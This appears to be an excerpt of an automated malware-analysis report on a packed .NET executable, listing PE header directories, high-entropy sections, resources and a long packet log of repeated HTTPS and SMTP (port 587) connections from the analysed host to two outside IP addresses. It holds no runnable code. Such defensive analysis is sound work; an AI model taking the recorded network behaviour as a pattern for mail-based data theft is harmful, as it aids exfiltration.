                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xa66000x3608
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000xa41d40xa42002d1243158acca84c0b10f453a17975c4False0.9725238599581112data7.9742405595701085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xa80000x20000x20006655e2f191b4c0728fc517c924389d02False0.8511962890625data7.305259548618807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xaa0000xc0x200a1f6ddafbf40ea4d07a583db73112350False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xa81000x1834PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9917688831504197
                                                                                    RT_GROUP_ICON0xa99440x14data1.05
                                                                                    RT_VERSION0xa99680x350data0.4386792452830189
                                                                                    RT_MANIFEST0xa9cc80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 18, 2024 18:26:01.959414959 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:01.959497929 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:01.959680080 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:01.972119093 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:01.972156048 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:02.208717108 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:02.208811998 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:02.212575912 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:02.212588072 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:02.213118076 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:02.279829979 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:02.324146986 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:02.501091957 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:02.501244068 CEST44349735104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:02.501308918 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:02.507363081 CEST49735443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:04.095067024 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:04.513639927 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:04.513744116 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:05.086004019 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:05.086210012 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:05.503406048 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:05.504209995 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:05.918344975 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:05.918821096 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:06.350991964 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.351057053 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.351097107 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.351172924 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:06.368079901 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:06.435358047 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:06.435435057 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.435528994 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:06.438587904 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:06.438626051 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.662347078 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.662591934 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:06.664465904 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:06.664493084 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.664906979 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.722110033 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:06.768141985 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.783967972 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.788341045 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:06.971940041 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.972084045 CEST44349739104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:06.972157955 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:06.974370956 CEST49739443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:07.204931974 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:07.205919027 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:07.434386015 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:07.622559071 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:07.622890949 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:07.852469921 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:07.852636099 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:08.079868078 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:08.232203960 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:08.232501030 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:08.595472097 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:08.607039928 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:08.649084091 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:08.649138927 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:08.649518013 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.024373055 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.024564028 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.081851006 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.082078934 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.440186024 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.440857887 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.497001886 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.497731924 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.497807026 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.497832060 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.497850895 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.867996931 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.868022919 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.868036032 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.868096113 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.870356083 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:09.911432028 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.911451101 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.911462069 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:09.911495924 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:10.285563946 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:10.292222023 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:10.708303928 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:10.708753109 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:10.739846945 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:10.780294895 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:11.125705004 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:11.126024961 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:11.563803911 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:11.564083099 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:11.971477032 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:12.014666080 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:12.528743982 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:12.967698097 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:13.014781952 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:14.087316036 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:14.504271984 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:14.526771069 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:14.526838064 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:14.526878119 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:14.526901960 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:14.943511009 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:14.943564892 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:14.943602085 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:14.943634033 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.675188065 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.675273895 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.675350904 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.678853989 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.678889990 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.713589907 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.843029022 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:15.895162106 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.895433903 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.900213003 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.900253057 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.900465965 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.009212017 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:16.056128025 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.204720974 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.204761982 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.204900980 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:16.216689110 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:16.774298906 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:17.251279116 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:17.251368999 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:17.751367092 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:17.751595974 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:18.204749107 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:18.204906940 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:18.687135935 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:18.687557936 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:19.138411045 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.138464928 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.138501883 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.138552904 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:19.140475988 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:19.554100037 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.562905073 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:20.035619020 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:20.036125898 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:20.471540928 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:20.471900940 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:20.906261921 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:20.906517029 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:21.359031916 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:21.360456944 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:21.819173098 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:21.819654942 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.244095087 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.244944096 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.245023012 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.245050907 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.245052099 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.665406942 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.665452003 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.665532112 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.665564060 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.474019051 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.514702082 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:23.707328081 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.707423925 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.707524061 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.710082054 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.710124016 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.934478045 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.934585094 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.939341068 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.939378023 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.940346003 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.983428955 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.984637976 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:24.032115936 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:24.249629974 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:24.249768972 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:24.249898911 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:24.259754896 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:24.670759916 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:25.070580959 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:25.070714951 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:25.561213017 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:25.561459064 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:25.960481882 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:25.960668087 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:26.370327950 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.370841980 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:26.800082922 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.800240993 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.800290108 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.800483942 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:26.802839041 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:27.185410023 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:27.195375919 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:27.532994986 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:27.533335924 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:27.877345085 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:27.877979040 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:28.243654013 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:28.244298935 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:28.626977921 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:28.627350092 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.043349981 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.044004917 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.433307886 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.434067965 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.434299946 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.434299946 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.434299946 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.832439899 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.832499027 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.832531929 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.832562923 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:30.640228987 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:30.702310085 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:31.922877073 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:32.007391930 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:32.340135098 CEST5874973894.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:32.340739012 CEST49738587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:32.341990948 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:32.397243023 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:32.397327900 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:32.734189034 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:32.734302044 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:33.116924047 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:33.117080927 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:33.419749022 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:33.419884920 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:33.454719067 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:33.455034971 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:33.736985922 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:33.737164974 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:33.791444063 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:33.791925907 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.055052996 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.055453062 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.183104038 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.183125973 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.183141947 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.183216095 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.185472965 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.387762070 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.387785912 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.387855053 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.387911081 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.389353037 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.557508945 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.560844898 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.706255913 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.712343931 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:34.941668034 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:34.948618889 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:35.044171095 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:35.044429064 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:35.326103926 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:35.326594114 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:35.378412962 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:35.378684044 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:35.701986074 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:35.736871004 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:35.839416981 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:35.839616060 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:35.852073908 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:35.852278948 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.156591892 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.156980991 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.157413006 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.193727016 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.194195032 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.194468021 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.493489981 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.493720055 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.545013905 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.545871019 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.810606956 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.814660072 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.814660072 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.814660072 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.814759970 CEST49754587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.885660887 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:36.887902975 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.887986898 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.887988091 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.888415098 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:36.889955044 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:37.132206917 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:37.132289886 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:37.132327080 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:37.132358074 CEST5874975494.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:37.236850977 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:37.236890078 CEST5874975394.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:27:37.236923933 CEST49753587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:37.237046003 CEST5874975394.100.26.91192.168.2.4
